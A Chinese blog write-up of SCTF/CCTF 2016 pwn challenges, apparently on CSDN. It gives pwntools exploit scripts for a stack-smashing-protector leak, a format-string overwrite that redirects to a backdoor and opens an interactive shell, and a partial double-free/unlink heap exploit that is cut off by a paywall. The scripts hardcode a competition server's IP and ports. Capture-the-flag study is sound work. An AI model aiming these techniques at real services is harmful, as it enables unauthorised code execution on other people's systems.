【SCTF&&CCTF 2016】 PWN_WRITEUP

最新推荐文章于 2024-05-12 11:14:01 发布
最新推荐文章于 2024-05-12 11:14:01 发布
阅读量3.6k 收藏
点赞数 1
分类专栏: CTF 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuanyunfeng3/article/details/51419900
版权

SCTF

pwn 1

这题是一个 ssp leak的利用。(和pctf的一题类似)。
资料:http://j00ru.vexillium.org/blog/24_03_15/dragons_ctf.pdf

from pwn import *

context(log_level="debug")
flag_addr = 0x600DC0

#p  = process('./pwn100')

#gdb.attach(pidof(p)[0])
for x in range(100):
    p=remote('58.213.63.30',60001)
    p.recvuntil('he flag?\n')
    p.sendline('a'*504+p64(flag_addr))
    p.recvline()
    p.recvline()

pwn2

这题是fmt的利用,由于这边fmt不在栈上,所以我采取了爆破的手段。(谁叫鹦鹉只能说两句话。。),同时出题者留下了后门,直接拿来用,改返回地址为后门地址就可以。PS:如果没给后门,也可以爆破鹦鹉让它多说话,那样我们也可以玩出花来。

资料:http://www.cnblogs.com/0xmuhe/p/5013074.html

# -*- coding: utf-8 -*-
from pwn import *
context(log_level="debug")

#p = process('./pwn200')

elf = ELF('pwn200')
puts_got = elf.got['puts']
strcmp_got = elf.got['strcmp']
system = 0x804A08E
def init():
    p.recvuntil('ut your name:\n')
    p.sendline('WinterSun')
    p.recvuntil('')
    p.recvuntil('3.Exit\n')
    p.sendline('2')
    p.recvuntil('2.Protego\n')
    p.sendline('2')
    p.recvuntil('2.Protego\n')
    p.sendline('2')
    p.recvuntil('2.Protego\n')
    p.sendline('2')
while True:
    p = remote('58.213.63.30',50021)    
    init()
    p.sendline('%%%dc'%(0xcc)+'%4$hhn'+'...')
    p.recvuntil('...')
    #gdb.attach(pidof(p)[0])
    p.sendline('%%%dc'%(system&0xffff)+'%12$hn'+'...')
    p.interactive()

#SCTF{FMT_HAVE_FUN_AHHHH}

pwn3

这是一题double free 的利用。

之前没遇到过,参考的资料比较多。

资料:
http://www.cnblogs.com/0xmuhe/p/5190132.html
http://drops.wooyun.org/tips/7326
http://drops.wooyun.org/binary/7958
重点是unlink的操作!

exp 如下。

from pwn import *

context(log_level="debug")
buf = 0x08049D80
elf = ELF('pwn300')
free = elf.got['free']

def setchunk(size):
    p.recvuntil('5. Exit\n')
    p.sendline('1')
    p.recvuntil(' want :')
    p.sendline(str(size))

def edit(index,content):
    p.recvuntil('5. Exit\n')
    p.sendline('3')
    p.recvuntil('s num:')
    p.sendline(str(index))
    p.recvuntil('content:')
    p.sendline(content)
def sh
最低0.47元/天 解锁文章
Angel枫丨灬红叶
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
日行一pwnpwn1_sctf_2016
m0_57221101的博客
05-13 567
用俩图床,有的有水印,有的没水印,折磨 距离上一次日行一pwn已经快一个月了,干脆改成月行一pwn吧(汗。这段时间去恶补了王爽老师的汇编语言。 结果一回来就做了这么一道题,函数封装的严严实实,打眼一看全是C++。想入门pwn这么难吗。 正片 BUUCTF在线评测 使用BUUCTF靶场,首先标准步骤下载--放到kali里面查--拖到windows用ida反汇编 发现只有一个NX保护 NX保护就是CPU不会执行放在内存段中的代码,也就是我们之前在BOF中学习的像内存中写入Shell的方法
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
ISCC 2018 PWN WriteUp
lacoucou的专栏
05-27 2326
ISCC一上线,所有上网的人便都看着他笑,有的叫道,“ISCC,你又处新题了!”他不回答,对柜里说,“加两道web题,再来一个Reverse。”便排出九文大钱。他们又故意的高声嚷道,“你出的题又被秒了!”ISCC 睁大眼睛说,“你怎么这样凭空污人清白……”“什么清白?我前天亲眼见你PWN题目一上线,就被网友吊着打。”ISCC便涨红了脸,额上的青筋条条绽出,争辩道,“PWN题怎么秒杀……PWN!……程序猿的事,能算秒杀么?”接连便是难懂的话,什么“Double Free”,什么“Use after Free”
CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1)
最新发布
2401_84970145的博客
05-12 1058
CTFPWN题型通常会直接给定一个已经编译好的二进制程序,然后参赛选手通过对二进制程序进行逆向分析和调试来找到利用漏洞,并编写利用代码发送playload,通过远程代码执行来达到攻击的效果,最终拿到目标机器的shell(控制台权限)来夺取flag。:常为C、C++及python写的一段程序,程序中往往包含着这样那样的漏洞。:利用反汇编等途径查看源代码并对程序进行理解的过程**调试:**程序调试是指通过分析和排查程序中的错误和问题,以找出程序运行过程中的错误和异常,并进行修复和优化的过程。
2018 百越杯 pwn(Boring Game Write up)
X丶 的博客
12-03 258
拿到题目,发现有libc库,想到应该就是要用到ret2libc了 先把pwn扔到IDA看看先 发现有明显的溢出漏洞。 发现程序是32位,且只开启了NX保护  利用思路: 1、泄漏__libc_start_main的真实地址,padding + write_plt + game_addr + 1 + GOT(__libc_start_main) + 4 2、然后根据libc库的偏...
pwn2_sctf_2016
m0sway的博客
04-06 654
pwn2_sctf_2016 WriteUp BUU_PWN
buuctf pwn2_sctf_2016
qq_42728977的博客
03-21 621
pwn2_sctf_2016 degree of difficulty: 2 source of the challenges:buuctf/sctf_2016 solving ideas:Stack overslow,atoi-function’s negative number overslow Put it in IDA32,we can see this easy program. l...
sctf2018-zhuanxv:SCTF2018-Zhuanxv Docker(源码)&Writeup
05-11
sctf2018-zhuanxv 部署 启动 ./start_up.sh 停止 docker-compose down WP 第一步:信息收集 信息收集,发现github上遗留的说明。 根据提供的url进入登录地址,发现用户名密码已经无法登陆 第二步:下载源码 查看网页...
SCTF2020:SCTF2020
04-01
SCTF2020:一场聚焦Java技术的网络安全挑战】 SCTF2020,全称为“SCTF2020网络安全技术挑战赛”,是一个专注于信息技术安全领域的年度竞赛,尤其强调了Java技术的应用。这个比赛旨在检验参赛者在Java编程、网络...
SCTF2020 官方Write-up.pdf
07-08
SCTF的官方wp!SCTF的官方wp!如有侵权请私信撤回谢谢。
SCTF差分晶振15013896510
06-21
SCTF差分晶振15013896510 SCTF差分晶振15013896510是一款差分晶振器件,提供了高频率稳定性和低抖动特性,适用于高速应用场景。 电气参数: * 频率:106.25、125、155.52、161.1328、187.5、312.5MHz * 频率稳定...
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
sctf pwn200
weixin_30363981的博客
04-04 230
  题目给出了pwn200和libc.so。使用IDA查看程序,发现逻辑很简单。   使用checksec查看pwn200的安全属性,如下图:      发现NX enabled,No PIE。   在第一次读(0x08048524位置)的时候,可以读取17个字节,观察栈结构:   发现可以将nbytes覆盖,可以覆盖为0xff。   在第二次读(0x08048596位置)的时候,...
pwn2_sctf_2016【BUUCTF
qq_41696518的博客
09-01 523
pwn2_sctf_2016【BUUCTF
CCTF-pwn3
edg_zj的博客
03-19 1183
pwn3是一个很基础的格式化字符串漏洞。程序一开始就将输入的username全部加1跟"sysbdmin"比较,正确以后进入下一步。main函数中有三个主要的功能函数,分别是put_file,get_file,show_dir。功能分别为保存文件名跟文件内容、根据文件名输出文件内容、根据输入文件名先后顺序输出。在get_file函数中我们发现printf(&dest)是可以利用的。由于可以...
CCTF-pwn3-printf
leeham的博客
09-08 2216
CCTF-pwn3-printf 开始做“实验吧”里边的溢出题目:printf 文件解压缩之后发现里边的压缩包名为cctf-2016-pwn,于是之后就一直看cctf-2016-pwn这题的思路。 当前的结果是: 可以通过题目压缩包中的pwn-ELF文件拿到本地Shell,但是连接到服务器上就不行了……目前仍在解决当中;而且复制粘贴已有的expoit只能获取到服务器上的shell,无法获取...
XDCTF PWN300&400 Writeup
这里没人
05-14 690
打了2天的XDCTF,被Reverse的题目教做人了。Sad (T.T) 到是pwn的题目基本打通了,除了最简单的pwn100 (T.T) pwn300和pwn400比较简单,所以writeup我就放在一起了。 PWN300 做完PWN300,感觉不会再有女朋友了T.T 就不吐槽猥琐的出题人了,直接开始分析程序。 checksec后发现竟然没有开nx,直接shellcode...
CCTF-PWN1&&PWN3
weixin_30596343的博客
04-25 124
CCTF-PWN1&&PWN3 PWN1比较有意思,在得到输入的数据后使用shutdown将标准输入,标准输出和标准错误关闭了读写功能的读。也就是不能进行交互了,要保证一次输入就能拿到flag。后来听joker师傅说可以用dl-resolve来做,有时间了准备试试。 题目可以进行信息泄露,所以我就单独写了一个信息泄露的脚步泄露出got里的函数地址,拿到这些函数地...
pwn1_sctf_2016
weixin_56301399的博客
07-21 1669
这道题目的情况是多了个替换字符的函数,使得一个I在存储中变为you,一个字节变为三字节,这时候需要根据情况确定多少字符使得栈溢出。 还是照常的流程,但题目已经开始变化了,我现在还是一知半解迷迷糊糊的状态,害,菜狗子还需努力。......
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ``` 对于 CentOS 或 RHEL 系统: ``` sudo yum install libstdc++.so.6 ``` 请注意,根据你使用的操作系统和软件包管理器,命令可能会有所不同。确保你的系统上已经安装了适当的软件包管理器,并根据你的情况进行相应的调整。如果问题仍然存在,请提供更多的上下文信息,以便我可以提供更具体的解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值